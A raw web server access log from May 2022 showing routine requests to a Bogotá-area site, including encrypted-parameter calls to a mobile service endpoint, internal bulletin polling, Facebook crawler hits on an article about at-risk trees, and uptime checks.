186.102.49.0 - - [18/May/2022:21:43:18 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+YyGY0oH4ARKG/VC+TGkeuM+8QPr1q3YfK4hsLmyputWw2gd7CLlJN4Ng69zJPj7myngjvpWi7bs4pOl4Zwzg/qeYX/BbXZYsxokTt5zRErS88M1irl5qYoLzvsIv3EwFOq+a/sjpusFOlTFy+bS+VNmjYzzZ6PZc=&u=U2FsdGVkX19G33n6+gIr6cGW+n7VAhhdwMny/xXAla0=&y=U2FsdGVkX19/cPCfKSSgmnsvbf07vIbB25tcetOmewnpUaM1n1DEJ55DO8gmnH4i HTTP/1.1" 200 25
186.102.49.0 - - [18/May/2022:21:43:18 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19TjmHcdYEQwbv55exnsocDgYcHbmI1Z8ebYbJvTZRTcXGTZCepzSg6xBbEjCHyJyMhOgn/rAnGLWXcUqQyWyQOF4PZwGdzgTJ7AopaUCsgZs41AQ7L9nxpfUp7qSSETc+/ObPNhLrmCR+0xD4tE63V0XSXerYscNI=&u=U2FsdGVkX19G33n6+gIr6cGW+n7VAhhdwMny/xXAla0=&y=U2FsdGVkX19/cPCfKSSgmnsvbf07vIbB25tcetOmewnpUaM1n1DEJ55DO8gmnH4i HTTP/1.1" 200 25
186.102.49.0 - - [18/May/2022:21:43:18 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+EduG4BKsLtZn65LIz1jxMvaK4X2/9YlCkIKPKcbgW8+jb8Ziy8Sei+aSfikoU3W//s0e5a24wfcGTUobSj5yN68c9SGRUVzf6/BoJ4jq6c52y/WJp5zpR3ph4H7wmWi35qjZlCFn+xt1+dnAsbd82wLUW3BQXuBc=&u=U2FsdGVkX19G33n6+gIr6cGW+n7VAhhdwMny/xXAla0=&y=U2FsdGVkX19/cPCfKSSgmnsvbf07vIbB25tcetOmewnpUaM1n1DEJ55DO8gmnH4i HTTP/1.1" 200 25
186.102.49.0 - - [18/May/2022:21:43:19 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18E6ABNI4PZVts8djIFc3oVQwkZeyrwaoTBDmRyMyJXuSyRTSzabZGug55A/yiS6Im0+3ehXbcldT/5Lk9DZ7vc25vX86pUe8Nk8OXo9Hgz1NCGhi9L4MPWlOhKaE6dxj3fs6fmMvvMIlaFIZpBuq6CABNZzk06lh8cbcozuWFDN1wl8EI8Q8+i&u=U2FsdGVkX19G33n6+gIr6cGW+n7VAhhdwMny/xXAla0=&y=U2FsdGVkX19/cPCfKSSgmnsvbf07vIbB25tcetOmewnpUaM1n1DEJ55DO8gmnH4i HTTP/1.1" 200 25
186.102.49.0 - - [18/May/2022:21:43:19 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18RaYPtZQTdbm3FhJF6unzVbsBnSjNWEIVyM4bJjsWTkVEQemrsC+PhlpXK3BReFqDnm52Ox26kFS8QnwYsDwC38mXrFtcaq5j+Eioy3dd/kxw526WkEwSybL75gCl8ZtKFpyH+tGYdWVCb118EhfbW4qMQ1JaYaAeRH9caBgLzBMqyGC6dSdZH7F5dcTWikRqnN5MT6mLSPLzowyQnvQczthHqEDa5IjYiORMJLEXJ1GRwC9UuqXEeyQ47ec7TUWuKlhqg/kjxXW/zq5hndcIMFziJwyXVqTdaXE0XqHvSuX2VwCl6fIK6K6wFaURommnoBRPSQI5em4KQQdioms4ZHLf1jXLGUOJAjsLP38o79cOPKbZxbyPnCkZKG0iTkVoz4RlSJXdaiYkHqTjZlDuz48n2Nj9AWRI=&u=U2FsdGVkX19G33n6+gIr6cGW+n7VAhhdwMny/xXAla0=&y=U2FsdGVkX19/cPCfKSSgmnsvbf07vIbB25tcetOmewnpUaM1n1DEJ55DO8gmnH4i HTTP/1.1" 200 24
186.102.49.0 - - [18/May/2022:21:43:19 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19uZl2mgs+jIBJsfsEt0RXWdCkPGF6keaXqFUiF89G5YmMgZnj2vAVlp9ZRwau9oZM02M+72Yjs3+5IIj/01maI6Y3Upw3SDzkr4pOPMeP+rKVPLwQrbiN+Oy5oGKnwkvjjITlYBT1PCyMcnqatuaHF+a1Gas9YSpYU7e9JFZTJ6LuiAd9V/gxpnK81oYv/oEzpS0UwRFuj2aF6ma2Ff+KhT2LsRcKVV46jiG9XdNQ7PaeA5x0LRtoXaYpDOkcgtXS8KQSXJZsSc+fCfpuQ332bmXlyR0ZQ6yhh809YRw1skKP7sjm3jFwJCPtol6zNoZxLM/EWISuH9f4klBOgz023XKjyEDGtep7sRO7cat7kB/7WOYjMz/0u&u=U2FsdGVkX19G33n6+gIr6cGW+n7VAhhdwMny/xXAla0=&y=U2FsdGVkX19/cPCfKSSgmnsvbf07vIbB25tcetOmewnpUaM1n1DEJ55DO8gmnH4i HTTP/1.1" 200 24
201.245.192.253 - - [18/May/2022:21:43:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47218
172.22.2.4 - - [18/May/2022:21:43:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/May/2022:21:44:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
173.252.111.117 - - [18/May/2022:21:47:18 -0500] "GET /arboles-en-riesgo-como-identificarlos-y-donde-reportarlos.html HTTP/1.1" 206 799
173.252.127.113 - - [18/May/2022:21:47:19 -0500] "GET /arboles-en-riesgo-como-identificarlos-y-donde-reportarlos.html?fbclid=IwAR2leDwNUNKEacunmNw7nTwLwWZJSyU84YYI1PW_Epfbn_n0Xk96XEWsWPE HTTP/1.1" 200 799
216.245.221.92 - - [18/May/2022:21:47:24 -0500] "HEAD / HTTP/1.1" 200 -
147.92.238.81 - - [18/May/2022:21:47:32 -0500] "GET /galeria/galeria/fotos/diaSC6Peq.jpg HTTP/1.1" 200 17665
173.252.107.17 - - [18/May/2022:21:48:14 -0500] "GET /arboles-en-riesgo-como-identificarlos-y-donde-reportarlos.html HTTP/1.1" 206 799
173.252.107.24 - - [18/May/2022:21:48:14 -0500] "GET /arboles-en-riesgo-como-identificarlos-y-donde-reportarlos.html HTTP/1.1" 206 799
173.252.107.119 - - [18/May/2022:21:48:16 -0500] "GET /images/arbolado-bogota-mayo-13.jpg HTTP/1.1" 200 62568
173.252.107.24 - - [18/May/2022:21:48:18 -0500] "GET /arboles-en-riesgo-como-identificarlos-y-donde-reportarlos.html HTTP/1.1" 206 799
172.22.2.4 - - [18/May/2022:21:49:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/May/2022:21:50:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58588
216.245.221.92 - - [18/May/2022:21:52:24 -0500] "HEAD / HTTP/1.1" 200 -
186.102.57.118 - - [18/May/2022:21:53:02 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/fhAQ2Cu5dM2yF1zT/Ik+mtEpugKXYP0C7/YoUITG0TKb7hVa3AkReE9NoKZxjWXq/xHs8blPX7GoUJ37eKFcTouTpWNqsfS60DARST8hPnKmoYnYg/N0fWaI5reBCv33ORESn0oNXPjPVZEuEKqR8tLCrvmThDPS21HP8ze+ljudVyN6bC1HyiOHSG6wDrmBAvRUtrrHEj1Dpfelewd2zG1Ks/G2Ng4XiLvniwZF1//fE3+m0RILGNpH6IBnU5o5Re0/Kf9BTEg==&u=U2FsdGVkX19tzq6ojOw6Z1giVFk8gYvndqIsvo8CeJE=&y=U2FsdGVkX18pqaKgOk3jn+5uIVJjuT2jjc0EubIwDeeNlZCPaxP0iXCC5gFwk3w+ HTTP/1.1" 200 25
